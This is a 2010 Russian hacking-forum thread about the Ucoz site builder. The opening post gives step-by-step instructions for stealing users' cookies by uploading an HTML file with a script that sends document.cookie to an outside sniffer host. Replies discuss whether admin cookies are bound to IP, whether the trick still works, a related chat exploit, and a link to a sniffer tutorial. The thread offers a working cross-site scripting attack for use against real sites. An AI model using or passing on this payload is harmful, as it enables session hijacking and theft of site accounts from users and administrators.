Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы А вот и долгожданный Ucoz

   

Страница 1 из 2 1 2 >

Опции темы

Поиск в этой теме

Опции просмотра

А вот и долгожданный Ucoz   #1   18.03.2010, 01:50 Dr..VATSON Новичок Регистрация: 07.12.2008 Сообщений: 12 Провел на форуме: 487591 Репутация: 43 А вот и долгожданный Ucoz Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз)) Тырим куки в Ucoz 1) создаём фйлик html вписываем код который тырит куки Код: <script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script> 2) Загружаем наш html файлик через "Обзор" Смотрим скрин 4) Должно получиться примерно так когда файлик загружен Смотрим скрин 5) Смотрим логи на сниффере (у меня свой сниффер) Смотрим скрин Ну вот и всё... Последний раз редактировалось Dr..VATSON; 18.03.2010 в 19:22..   Dr..VATSON Посмотреть профиль Репутация Отправить личное сообщение для Dr..VATSON Найти все сообщения от Dr..VATSON Добавить в друзья   #2   26.03.2010, 09:56 general.fox Участник форума Регистрация: 09.11.2009 Сообщений: 265 Провел на форуме: 312907 Репутация: 18 На UcoZе куки Админов привязаны к IP.   general.fox Посмотреть профиль Репутация Отправить личное сообщение для general.fox Найти все сообщения от general.fox Добавить в друзья   #3   26.03.2010, 09:58 general.fox Участник форума Регистрация: 09.11.2009 Сообщений: 265 Провел на форуме: 312907 Репутация: 18 Хотя может я ошибаюсь...   general.fox Посмотреть профиль Репутация Отправить личное сообщение для general.fox Найти все сообщения от general.fox Добавить в друзья   #4   04.04.2010, 17:16 Koder45ru Новичок Регистрация: 18.02.2010 Сообщений: 4 Провел на форуме: 12863 Репутация: 0 Хех где то похожее читал ток там через чат можно админку на укозе утащить.. а так в целом прикольно за мутил респект..   Koder45ru Посмотреть профиль Репутация Отправить личное сообщение для Koder45ru Найти все сообщения от Koder45ru Добавить в друзья   #5   05.04.2010, 23:03 Rejiser Новичок Регистрация: 09.05.2009 Сообщений: 27 Провел на форуме: 153684 Репутация: 21 Цитата: Сообщение от Koder45ru   Хех где то похожее читал ток там через чат можно админку на укозе утащить.. не подскажешь где читал?)   Rejiser Посмотреть профиль Репутация Отправить личное сообщение для Rejiser Найти все сообщения от Rejiser Добавить в друзья   #6   06.04.2010, 07:52 sparrow3000 Участник форума Регистрация: 27.03.2009 Сообщений: 248 Провел на форуме: 1152350 Репутация: 54 Цитата: Сообщение от Koder45ru   Хех где то похожее читал ток там через чат можно админку на укозе утащить.. а так в целом прикольно за мутил респект.. если про бесцветный смайлик со скриптом то это не пашет уже   sparrow3000 Посмотреть профиль Репутация Отправить личное сообщение для sparrow3000 Найти все сообщения от sparrow3000 Добавить в друзья   #7   09.04.2010, 05:14 [Feldmarschall] Участник форума Регистрация: 06.01.2010 Сообщений: 136 Провел на форуме: 568388 Репутация: 87 не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде   [Feldmarschall] Посмотреть профиль Репутация Отправить личное сообщение для [Feldmarschall] Найти все сообщения от [Feldmarschall] Добавить в друзья   #8   14.05.2010, 12:06 NeoX Познающий Регистрация: 23.08.2008 Сообщений: 95 Провел на форуме: 585487 Репутация: 45 еще актуально?   NeoX Посмотреть профиль Репутация Отправить личное сообщение для NeoX Найти все сообщения от NeoX Добавить в друзья   #9   16.05.2010, 22:56 niva622 Новичок Регистрация: 05.11.2008 Сообщений: 11 Провел на форуме: 93930 Репутация: 0 еще актуально, но на некоторых сайтах запрещено добавлять html файлы..   niva622 Посмотреть профиль Репутация Отправить личное сообщение для niva622 Найти все сообщения от niva622 Добавить в друзья   #10   26.05.2010, 16:48 <Maxwell> Новичок Регистрация: 27.10.2009 Сообщений: 23 Провел на форуме: 327324 Репутация: 12 Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.   <Maxwell> Посмотреть профиль Репутация Отправить личное сообщение для <Maxwell> Найти все сообщения от <Maxwell> Добавить в друзья

Страница 1 из 2 1 2 >

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
red.Button - UCOZ Pack v.3.0 - дополнении к доргену	GivioN	Разное - Покупка, продажа, обмен	0	03.01.2010 23:13
Скрипты под Ucoz	Vandam	PHP, PERL, MySQL, JavaScript	14	26.02.2009 16:50
Лучший стих для античата	$ED$	Болталка	29	12.02.2009 02:47
Было в фирме три админа.!!! =)	Utochka	Болталка	15	18.03.2006 03:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ЛИЧНЫЕ ФОРУМЫ     Olbanec - Арбитраж трафика РАЗРАБОТКА_NEW     Ваши проекты     SEO — тонкости, методы раскрутки         Услуги, Покупка и Продажа в SEO     Хостинги — Hostings         Хостинг, Dedicated, VDS, Сервера - покупка, продажа     Для Администратора         Apple: Mac, OS X, iOS         AntiDDoS - АнтиДДОС         Windows         Linux, Freebsd, *nix ПРОГРАММИРОВАНИЕ_NEW     Общие вопросы программирования         ПО для Web разработки     PHP     Javascript     Python     C/C++, C#, Rust, Swift, Go, Java, Perl, Ruby     Реверсинг ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ     Партнерки     Freelance — О работе         Предложения работы, услуг         Поиск работы, оказание услуг     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Платежные системы         Электронные валюты: Обмен, Вывод, Ввод         Blockchain, Криптовалюты, смарт-контракты ANTICHAT     Новости форума     Правила форума ИНФО     Мировые новости. Обсуждения.     Статьи         Избранное Безопасность и Уязвимости     Уязвимости         Веб-уязвимости         Уязвимости CMS / форумов         Уязвимости Mail-сервисов         Skype, IRC, ICQ, Jabber и другие IM         Инструменты     Безопасность и Анонимность         Защита ОС: антивирусы, файрволы, антишпионы         Анонимность         Windows     Криптография, расшифровка хешей     Электроника и Фрикинг Программирование     PHP, PERL, MySQL, JavaScript         ПО для Web разработчика     С/С++, C#, Delphi, .NET, Asm     Реверсинг SЕО/Финансовые задачи/Социальные сети     SЕО - тонкости, методы раскрутки         Партнерки         Услуги, Покупка и Продажа в SEO         Платежные системы: Webmoney, Yandex Деньги, РБК Деньги и т. д.         Белые методы раскрутки         Черные методы раскрутки         Обсуждение Ваших сайтов         Статьи     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Инвайты, mails, базы - Покупка, продажа         Доступы, shells, ftp - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, лоады, инсталлы, загрузки - Покупка, продажа         О Работе         Покупка, продажа, услуги в Соц. Сетях     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Хостинги - Hostings Оффтоп     Болталка     Forum for discussion of ANTICHAT     Video.Antichat         Новогодний видеоконкурс [2016-2017]         Завершенные конкурсы     Архив         ICQ - Покупка, продажа